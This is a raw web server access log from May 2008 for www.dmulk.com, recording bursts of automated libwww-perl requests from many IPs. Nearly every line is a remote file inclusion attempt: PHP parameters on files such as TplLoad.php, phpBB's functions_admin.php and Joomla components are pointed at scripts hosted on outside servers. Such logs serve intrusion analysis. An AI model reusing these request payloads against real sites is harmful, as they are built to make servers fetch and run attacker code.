67.19.105.42 - - [03/May/2008:09:30:18 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.105.42 - - [03/May/2008:09:30:18 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.105.42 - - [03/May/2008:09:30:18 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.105.42 - - [03/May/2008:09:30:19 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.105.42 - - [03/May/2008:09:30:19 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.105.42 - - [03/May/2008:09:30:20 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.150.191.64 - - [03/May/2008:09:30:20 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.150.191.64 - - [03/May/2008:09:30:21 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.150.191.64 - - [03/May/2008:09:30:21 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.150.191.64 - - [03/May/2008:09:30:21 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
131.128.169.79 - - [03/May/2008:09:30:21 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
131.128.169.79 - - [03/May/2008:09:30:21 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.150.191.64 - - [03/May/2008:09:30:21 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
131.128.169.79 - - [03/May/2008:09:30:21 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
131.128.169.79 - - [03/May/2008:09:30:21 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.150.191.64 - - [03/May/2008:09:30:22 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
131.128.169.79 - - [03/May/2008:09:30:22 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
131.128.169.79 - - [03/May/2008:09:30:22 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.246.154.12 - - [03/May/2008:09:30:22 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.246.154.12 - - [03/May/2008:09:30:23 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.246.154.12 - - [03/May/2008:09:30:23 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.246.154.12 - - [03/May/2008:09:30:23 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.246.154.12 - - [03/May/2008:09:30:23 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.246.154.12 - - [03/May/2008:09:30:23 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.81.233 - - [03/May/2008:09:30:24 -0700] "GET /logs/access_080302.log/index.php?trans=ftp://128.175.10.3/incoming/smile04.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.81.233 - - [03/May/2008:09:30:29 -0700] "GET /index.php?trans=ftp://128.175.10.3/incoming/smile04.jpg? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.81.233 - - [03/May/2008:09:30:29 -0700] "GET /logs/index.php?trans=ftp://128.175.10.3/incoming/smile04.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.113.24.154 - - [03/May/2008:09:30:33 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [03/May/2008:09:30:33 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [03/May/2008:09:30:34 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
69.89.21.99 - - [03/May/2008:09:31:01 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.89.21.99 - - [03/May/2008:09:31:01 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.89.21.99 - - [03/May/2008:09:31:01 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.73.146.54 - - [03/May/2008:09:31:02 -0700] "GET /logs/access_080321.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.73.146.54 - - [03/May/2008:09:31:04 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.73.146.54 - - [03/May/2008:09:31:04 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.73.146.54 - - [03/May/2008:09:31:04 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.246.154.12 - - [03/May/2008:09:31:04 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.246.154.12 - - [03/May/2008:09:31:05 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.246.154.12 - - [03/May/2008:09:31:05 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.73.146.54 - - [03/May/2008:09:31:07 -0700] "GET /logs/access_080321.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.150.191.64 - - [03/May/2008:09:31:08 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.150.191.64 - - [03/May/2008:09:31:08 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.150.191.64 - - [03/May/2008:09:31:09 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.34.16.180 - - [03/May/2008:09:31:10 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.34.16.180 - - [03/May/2008:09:31:10 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.34.16.180 - - [03/May/2008:09:31:10 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.34.16.180 - - [03/May/2008:09:31:10 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.34.16.180 - - [03/May/2008:09:31:11 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.34.16.180 - - [03/May/2008:09:31:11 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.25.13.188 - - [03/May/2008:09:31:14 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.13.188 - - [03/May/2008:09:31:15 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.13.188 - - [03/May/2008:09:31:15 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.13.188 - - [03/May/2008:09:31:15 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
131.128.169.79 - - [03/May/2008:09:31:24 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
131.128.169.79 - - [03/May/2008:09:31:24 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
131.128.169.79 - - [03/May/2008:09:31:25 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
131.128.169.79 - - [03/May/2008:09:31:33 -0700] "GET /logs/access_080321.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
131.128.169.79 - - [03/May/2008:09:31:39 -0700] "GET /logs/access_080321.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.53.240.146 - - [03/May/2008:09:31:41 -0700] "GET /logs/index.php?meio.php=http://www.dd3str0y3r.kit.net/scan/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.19.130 - - [03/May/2008:09:31:43 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.105.42 - - [03/May/2008:09:31:47 -0700] "GET /logs/access_080321.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.240.146 - - [03/May/2008:09:31:48 -0700] "GET /index.php?meio.php=http://www.dd3str0y3r.kit.net/scan/id2.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
63.246.154.12 - - [03/May/2008:09:31:48 -0700] "GET /logs/access_080321.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.25.230.39 - - [03/May/2008:09:31:53 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.olgunlar.com/mambots/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.25.230.39 - - [03/May/2008:09:31:54 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.olgunlar.com/mambots/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [03/May/2008:09:31:55 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [03/May/2008:09:31:55 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.150.191.64 - - [03/May/2008:09:31:56 -0700] "GET /logs/access_080321.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.105.42 - - [03/May/2008:09:31:56 -0700] "GET /logs/access_080321.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.150.191.64 - - [03/May/2008:09:31:57 -0700] "GET /logs/access_080321.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.246.154.12 - - [03/May/2008:09:31:58 -0700] "GET /logs/access_080321.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.89.21.99 - - [03/May/2008:09:32:09 -0700] "GET /logs/access_080321.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.121.106.117 - - [03/May/2008:09:32:12 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://www.aftab.ae/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.121.106.117 - - [03/May/2008:09:32:17 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.aftab.ae/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.121.106.117 - - [03/May/2008:09:32:19 -0700] "GET //index.php?option=com_custompages&cpage=http://www.aftab.ae/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
131.128.169.79 - - [03/May/2008:09:32:36 -0700] "GET /logs/access_080321.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.34.16.180 - - [03/May/2008:09:32:37 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.34.16.180 - - [03/May/2008:09:32:38 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.34.16.180 - - [03/May/2008:09:32:38 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.25.13.188 - - [03/May/2008:09:32:48 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.13.188 - - [03/May/2008:09:32:48 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.13.188 - - [03/May/2008:09:32:48 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.19.130 - - [03/May/2008:09:32:50 -0700] "GET /logs/access_080308.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.73.146.54 - - [03/May/2008:09:32:53 -0700] "GET /logs/access_080321.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.34.16.180 - - [03/May/2008:09:32:53 -0700] "GET /logs/access_080321.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.246.154.12 - - [03/May/2008:09:32:54 -0700] "GET /logs/access_080321.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [03/May/2008:09:32:58 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [03/May/2008:09:32:59 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [03/May/2008:09:32:59 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.34.16.180 - - [03/May/2008:09:33:00 -0700] "GET /logs/access_080321.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.150.191.64 - - [03/May/2008:09:33:04 -0700] "GET /logs/access_080321.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.138.217.3 - - [03/May/2008:09:33:06 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.13.188 - - [03/May/2008:09:33:06 -0700] "GET /logs/access_080321.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.13.188 - - [03/May/2008:09:33:06 -0700] "GET /logs/access_080321.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.138.217.3 - - [03/May/2008:09:33:06 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.138.217.3 - - [03/May/2008:09:33:07 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.51.25.186 - - [03/May/2008:09:33:21 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [03/May/2008:09:33:21 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [03/May/2008:09:33:21 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [03/May/2008:09:33:21 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [03/May/2008:09:33:21 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [03/May/2008:09:33:21 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [03/May/2008:09:33:21 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [03/May/2008:09:33:21 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [03/May/2008:09:33:21 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.177.4.33 - - [03/May/2008:09:34:28 -0700] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.fkaskad.ru/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
